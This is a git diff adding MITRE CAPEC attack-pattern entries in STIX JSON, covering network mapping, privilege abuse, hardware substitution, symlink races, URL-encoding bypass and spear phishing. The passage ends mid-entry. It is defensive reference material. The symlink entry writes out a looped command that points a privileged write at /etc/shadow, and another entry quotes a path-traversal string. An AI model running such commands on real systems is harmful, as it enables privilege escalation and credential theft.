"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in scanning activities to map network nodes, hosts, devices, and routes. Adversaries usually perform this type of network reconnaissance during the early stages of attack against an external network. Many types of scanning utilities are typically employed, including ICMP tools, network mappers, port scanners, and route testing utilities such as traceroute.", + "external_references": [ + { + "external_id": "CAPEC-309", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Network Configuration Discovery", + "external_id": "T1016", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1016" + }, + { + "description": "System Network Connections Discovery", + "external_id": "T1049", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1049" + }, + { + "description": "Gather Victim Network Information", + "external_id": "T1590", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1590" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "external_id": "REF-130", + "source_name": "reference_from_CAPEC", + "url": "http://phrack.org/issues/51/11.html" + } + ], + "id": "attack-pattern--fd114e53-fdc0-4eef-8254-40ef0d4ea482", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Network Topology Mapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Other" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--e6c6d5fb-33e8-43ec-bff5-c0ade9d51304", + "attack-pattern--88933ba2-fe2a-4b71-ac08-2537c5903b2e", + "attack-pattern--93f8b21a-7680-4813-8b4b-2976f5765320", + "attack-pattern--9d08b257-08f6-42e3-ad7e-41aaf07789a1" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_resources_required": [ + "Probing requires the ability to interactively send and receive data from a target, whereas passive listening requires a sufficient understanding of the protocol to analyze a preexisting channel of communication." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json new file mode 100644 index 0000000000000000000000000000000000000000..af961110a7f89354a52ea8420676bf72dbbcd610 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--67087e15-2fc6-4a01-bf4d-e97cdfc93018", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources.", + "external_references": [ + { + "external_id": "CAPEC-122", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/122.html" + }, + { + "external_id": "CWE-269", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/269.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1317", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1317.html" + }, + { + "description": "Abuse Elevation Control Mechanism", + "external_id": "T1548", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1548" + } + ], + "id": "attack-pattern--fd669b7d-0e79-473c-9808-a860dfb0c871", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Privilege Abuse", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_can_precede_refs": [ + "attack-pattern--f231b993-ed39-40cf-adfb-9828ddcfc642" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Improperly configured account privileges allowed unauthorized users on a hospital's network to access the medical records for over 3,000 patients. Thus compromising data integrity and confidentiality in addition to HIPAA violations.\n " + ], + "x_capec_extended_description": "\n If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts.\n This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--92cdcd3d-d734-4442-afc3-4599f261498b", + "attack-pattern--9ad2c2eb-9939-4590-9683-2e789692d262", + "attack-pattern--aac17300-6cdd-4f50-82c3-da5a01d225ac", + "attack-pattern--d9717514-c621-49cd-b8e1-fd7cc1daa8d1", + "attack-pattern--c195a0a3-62fc-4def-9702-8938440cc9a7" + ], + "x_capec_prerequisites": [ + "The target must have misconfigured their access control mechanisms such that sensitive information, which should only be accessible to more trusted users, remains accessible to less trusted users.", + "The adversary must have access to the target, albeit with an account that is less privileged than would be appropriate for the targeted resources." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. The ability to access the target is required." + ], + "x_capec_skills_required": { + "Low": "Adversary can leverage privileged features they already have access to without additional effort or skill. Adversary is only required to have access to an account with improper priveleges." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json new file mode 100644 index 0000000000000000000000000000000000000000..978f41af81a426194e442ef8841b180dc1ae81f6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e.json @@ -0,0 +1,58 @@ +{ + "id": "bundle--a7b5f419-8ef3-4687-a7be-15a8f95ac324", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker substitutes out a tested and approved hardware component for a maliciously-altered hardware component. This type of attack is carried out directly on the system, enabling the attacker to then cause disruption or additional compromise.", + "external_references": [ + { + "external_id": "CAPEC-531", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/531.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + } + ], + "id": "attack-pattern--fda936c1-236d-4460-a5a9-4555d9583b2e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Component Substitution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "An attacker has access to an organization's warehouse of card readers being included as a part of an overall security system. By replacing a critical hardware component in the card reader, the attacker is able to alter the function of the card reader to allow an attacker-supplied card to bypass a security checkpoint. The card reader is placed in the warehouse, and later used in the victim's security system. The attacker is then able to go to the victim and use their own card and bypass a physical security checkpoint and gain access to the victim's location for further malicious activity." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--b217a941-e854-468d-921b-beeba3c73a98", + "attack-pattern--cd81f98a-aa72-4331-a7dd-5f9cd92332e2" + ], + "x_capec_prerequisites": [ + "Physical access to the system or the integration facility where hardware components are kept." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious system components that perform the same functions and processes as their non-malicious counterparts." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json new file mode 100644 index 0000000000000000000000000000000000000000..514f6b50834bec483e8c2c9bf5a4725028fda805 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973.json @@ -0,0 +1,106 @@ +{ + "id": "bundle--455a72e4-499c-4f10-9cfa-054e87cf6f79", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack leverages the use of symbolic links (Symlinks) in order to write to sensitive files. An attacker can create a Symlink link to a target file not otherwise accessible to them. When the privileged program tries to create a temporary file with the same name as the Symlink link, it will actually write to the target file pointed to by the attackers' Symlink link. If the attacker can insert malicious content in the temporary file they will be writing to the sensitive file by using the Symlink. The race occurs because the system checks if the temporary file exists, then creates the file. The attacker would typically create the Symlink during the interval between the check and the creation of the temporary file.", + "external_references": [ + { + "external_id": "CAPEC-27", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/27.html" + }, + { + "external_id": "CWE-367", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/367.html" + }, + { + "external_id": "CWE-61", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/61.html" + }, + { + "external_id": "CWE-662", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/662.html" + }, + { + "external_id": "CWE-689", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/689.html" + }, + { + "external_id": "CWE-667", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/667.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-115", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Symlink_race" + }, + { + "description": "mkstemp (IEEE Std 1003.1, 2004 Edition), The Open Group Base Specifications Issue 6", + "external_id": "REF-116", + "source_name": "reference_from_CAPEC", + "url": "http://www.opengroup.org/onlinepubs/009695399/functions/mkstemp.html" + } + ], + "id": "attack-pattern--fdeff5dd-62e2-43b2-8eea-5e97307cf973", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Leveraging Race Conditions via Symbolic Links", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3da1844e-c905-420a-9179-260356a85a05" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this naive example, the Unix program foo is setuid. Its function is to retrieve information for the accounts specified by the user. For \"efficiency,\" it sorts the requested accounts into a temporary file (/tmp/foo naturally) before making the queries.\n The directory /tmp is world-writable. The malicious user creates a symbolic link to the file /.rhosts named /tmp/foo. Then, they invokes foo with \"user\" as the requested account. The program creates the (temporary) file /tmp/foo (really creating /.rhosts) and puts the requested account (e.g. \"user password\")) in it. It removes the temporary file (merely removing the symbolic link).\n Now the /.rhosts contains + +, which is the incantation necessary to allow anyone to use rlogin to log into the computer as the superuser.\n [REF-115]\n ", + "GNU \"ed\" utility (before 0.3) allows local users to overwrite arbitrary files via a symlink attack on temporary files, possibly in the open_sbuf function. See also: CVE-2006-6939", + "OpenmosixCollector and OpenMosixView in OpenMosixView 1.5 allow local users to overwrite or delete arbitrary files via a symlink attack on (1) temporary files in the openmosixcollector directory or (2) nodes.tmp. See also: CVE-2005-0894", + "Setuid product allows file reading by replacing a file being edited with a symlink to the targeted file, leaking the result in error messages when parsing fails. See also: CVE-2000-0972" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Verify that target host's platform supports symbolic links.: This attack pattern is only applicable on platforms that support symbolic links.

    2. Techniques
    Research target platform to determine whether it supports symbolic links.
    Create a symbolic link and ensure that it works as expected on the given platform.

  2. Examine application's file I/O behavior: Analyze the application's file I/O behavior to determine where it stores files, as well as the operations it performs to read/write files.

    3. Techniques
    Use kernel tracing utility such as ktrace to monitor application behavior.
    Use debugging utility such as File Monitor to monitor the application's filesystem I/O calls
    Watch temporary directories to see when temporary files are created, modified and deleted.
    Analyze source code for open-source systems like Linux, Apache, etc.

Experiment

  1. Verify ability to write to filesystem: The attacker verifies ability to write to the target host's file system.

    2. Techniques
    Create a file that does not exist in the target directory (e.g. \"touch temp.txt\" in UNIX-like systems)
    On platforms that differentiate between file creation and file modification, if the target file that the application writes to already exists, attempt to modify it.
    Verify permissions on target directory

Exploit

  1. Replace file with a symlink to a sensitive system file.: Between the time that the application checks to see if a file exists (or if the user has access to it) and the time the application actually opens the file, the attacker replaces the file with a symlink to a sensitive system file.

    2. Techniques
    Create an infinite loop containing commands such as \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\". Wait for an instance where the following steps occur in the given order: (1) Application ensures that tempfile.dat exists and that the user has access to it, (2) \"rm -f tempfile.dat; ln -s /etc/shadow tempfile.dat\", and (3) Application opens tempfile.dat for writing, and inadvertently opens /etc/shadow for writing instead.
    Use other techniques with debugging tools to replace the file between the time the application checks the file and the time the application opens it.
", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The attacker is able to create Symlink links on the target host.", + "Tainted data from the attacker is used and copied to temporary files.", + "The target host does insecure temporary file creation." + ], + "x_capec_skills_required": { + "Medium": "This attack is sophisticated because the attacker has to overcome a few challenges such as creating symlinks on the target host during a precise timing, inserting malicious data in the temporary file and have knowledge about the temporary files created (file name and function which creates them)." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json new file mode 100644 index 0000000000000000000000000000000000000000..69e4973e81fd39c395f62fbb32f5b0fea1387c0e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176.json @@ -0,0 +1,50 @@ +{ + "id": "bundle--8b43d226-dc27-481b-b582-515eb54c2a05", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits a weakness in access control to gain access to currently installed hardware and precedes to implement changes or secretly replace a hardware component which undermines the system's integrity for the purpose of carrying out an attack.", + "external_references": [ + { + "external_id": "CAPEC-401", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/401.html" + }, + { + "external_id": "CWE-1263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1263.html" + } + ], + "id": "attack-pattern--fdf61d51-9432-47d3-9376-7cf51fc86176", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Physically Hacking Hardware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--7fd3928c-accb-4a35-ba64-000339399ede" + ], + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "A malicious subcontractor or subcontractor's employee that is responsible for system maintenance secretly replaces a hard drive with one containing malicious code that will allow for backdoor access once deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--6aac48b7-c277-46ba-b9c0-523471a84c11" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json new file mode 100644 index 0000000000000000000000000000000000000000..c82fdb2bdd20d1c85d1ae62027ed2b896d19af67 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732.json @@ -0,0 +1,155 @@ +{ + "id": "bundle--3f0db678-d127-46f2-a735-b410a59d4f38", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.", + "external_references": [ + { + "external_id": "CAPEC-64", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/64.html" + }, + { + "external_id": "CWE-177", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/177.html" + }, + { + "external_id": "CWE-173", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html" + }, + { + "external_id": "CWE-172", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html" + }, + { + "external_id": "CWE-73", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html" + }, + { + "external_id": "CWE-22", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Gunter Ollmann, URL Encoded Attacks - Attacks using the common web browser, CGISecurity.com", + "external_id": "REF-495", + "source_name": "reference_from_CAPEC", + "url": "http://www.cgisecurity.com/lib/URLEmbeddedAttacks.html" + }, + { + "description": "T. Berners-Lee, R. Fielding, L. Masinter, RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax, 2005--01", + "external_id": "REF-496", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc3986.txt" + }, + { + "description": "T. Berners-Lee, L. Masinter, M. McCahill, RFC 1738 - Uniform Resource Locators (URL), 1994--12", + "external_id": "REF-497", + "source_name": "reference_from_CAPEC", + "url": "http://www.ietf.org/rfc/rfc1738.txt" + }, + { + "description": "HTML URL Encoding Reference, W3Schools.com, Refsnes Data", + "external_id": "REF-498", + "source_name": "reference_from_CAPEC", + "url": "http://www.w3schools.com/tags/ref_urlencode.asp" + }, + { + "description": "The URLEncode and URLDecode Page, Albion Research Ltd", + "external_id": "REF-499", + "source_name": "reference_from_CAPEC", + "url": "http://www.albionresearch.com/misc/urlencode.php" + }, + { + "description": "David Wheeler, Secure Programming for Linux and Unix HOWTO", + "external_id": "REF-500", + "source_name": "reference_from_CAPEC", + "url": "http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/filter-html.html#VALIDATING-URIS" + } + ], + "id": "attack-pattern--feed1b00-2f2b-490f-aee1-0de5b1fbf732", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Slashes and URL Encoding Combined to Bypass Validation Logic", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a1af7c24-25cb-46e5-a27b-ed316e1f91ce" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Read Data", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Attack Example: Combined Encodings CesarFTP\n Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.\n An attacker could provide a URL that included a string like\n /...%5C/\n This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot.See also: CVE-2001-1335" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The attacker accesses the server using a specific URL.

Experiment

  1. The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly.

Exploit

  1. The attacker crafts a malicious URL string request and sends it to the server.

  2. The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts and decodes URL string request.", + "The application performs insufficient filtering/canonicalization on the URLs." + ], + "x_capec_skills_required": { + "Low": "An attacker can try special characters in the URL and bypass the URL validation.", + "Medium": "The attacker may write a script to defeat the input filtering mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json new file mode 100644 index 0000000000000000000000000000000000000000..6f3b9855aee2609c1b8bc02e9a77a2b4b36ae7ca --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1.json @@ -0,0 +1,123 @@ +{ + "id": "bundle--af20cc47-a387-4278-938d-16003b9f7e59", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary targets a specific user or group with a Phishing (CAPEC-98) attack tailored to a category of users in order to have maximum relevance and deceptive capability. Spear Phishing is an enhanced version of the Phishing attack targeted to a specific user or group. The quality of the targeted email is usually enhanced by appearing to come from a known or trusted entity. If the email account of some trusted entity has been compromised the message may be digitally signed. The message will contain information specific to the targeted users that will enhance the probability that they will follow the URL to the compromised site. For example, the message may indicate knowledge of the targets employment, residence, interests, or other information that suggests familiarity. As soon as the user follows the instructions in the message, the attack proceeds as a standard Phishing attack.", + "external_references": [ + { + "external_id": "CAPEC-163", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/163.html" + }, + { + "external_id": "CWE-451", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/451.html" + }, + { + "description": "Internal Spearfishing", + "external_id": "T1534", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1534" + }, + { + "description": "Phishing: Spearfishing Attachment", + "external_id": "T1566.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/001" + }, + { + "description": "Phishing: Spearfishing Link", + "external_id": "T1566.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/002" + }, + { + "description": "Phishing: Spearfishing via Service", + "external_id": "T1566.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1566/003" + }, + { + "description": "Phishing for Information: Spearfishing Service", + "external_id": "T1598.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/001" + }, + { + "description": "Phishing for Information: Spearfishing Attachment", + "external_id": "T1598.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/002" + }, + { + "description": "Phishing for Information: Spearfishing Link", + "external_id": "T1598.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1598/003" + } + ], + "id": "attack-pattern--ff3cf9fc-c308-4571-8a01-ecae629a49c1", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Spear Phishing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6", + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a", + "attack-pattern--8b329689-f8f8-466e-a890-4e30b8d8ec30" + ], + "x_capec_child_of_refs": [ + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_consequences": { + "Accountability": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authentication": [ + "Gain Privileges (Privilege Escalation)" + ], + "Authorization": [ + "Gain Privileges (Privilege Escalation)" + ], + "Confidentiality": [ + "Read Data (Information Leakage)" + ], + "Integrity": [ + "Modify Data (Data Modification)" + ], + "Non-Repudiation": [ + "Gain Privileges (Privilege Escalation)" + ] + }, + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_example_instances": [ + "The target gets an official looking e-mail from their bank stating that their account has been temporarily locked due to suspected unauthorized activity that happened in a different area from where they live (details might be provided by the spear phishers) and that they need to click on the link included in the e-mail to log in to their bank account in order to unlock it. The link in the e-mail looks very similar to that of their bank and once the link is clicked, the log in page is the exact replica. The target supplies their login credentials after which they are notified that their account has now been unlocked and that everything is fine. An adversary has just collected the target's online banking information which can now be used by them to log into the target's bank account and transfer money to a bank account of the adversary's choice.", + "An adversary can leverage a weakness in the SMB protocol by sending the target, an official looking e-mail from their employer's IT Department stating that their system has vulnerable software, which they need to manually patch by accessing an updated version of the software by clicking on a provided link to a network share. Once the link is clicked, the target is directed to an external server controlled by the adversary or to a malicious file on a public access share. The SMB protocol will then attempt to authenticate the target to the adversary controlled server, which allows the adversary to capture the hashed credentials over SMB. These credentials can then be used to execute offline brute force attacks or a \"Pass The Hash\" attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Obtain useful contextual detailed information about the targeted user or organization: An adversary collects useful contextual detailed information about the targeted user or organization in order to craft a more deceptive and enticing message to lure the target into responding.

    2. Techniques
    Conduct web searching research of target. See also: CAPEC-118.
    Identify trusted associates, colleagues and friends of target. See also: CAPEC-118.
    Utilize social engineering attack patterns such as Pretexting. See also: CAPEC-407.
    Collect social information via dumpster diving. See also: CAPEC-406.
    Collect social information via traditional sources. See also: CAPEC-118.
    Collect social information via Non-traditional sources. See also: CAPEC-118.

Experiment

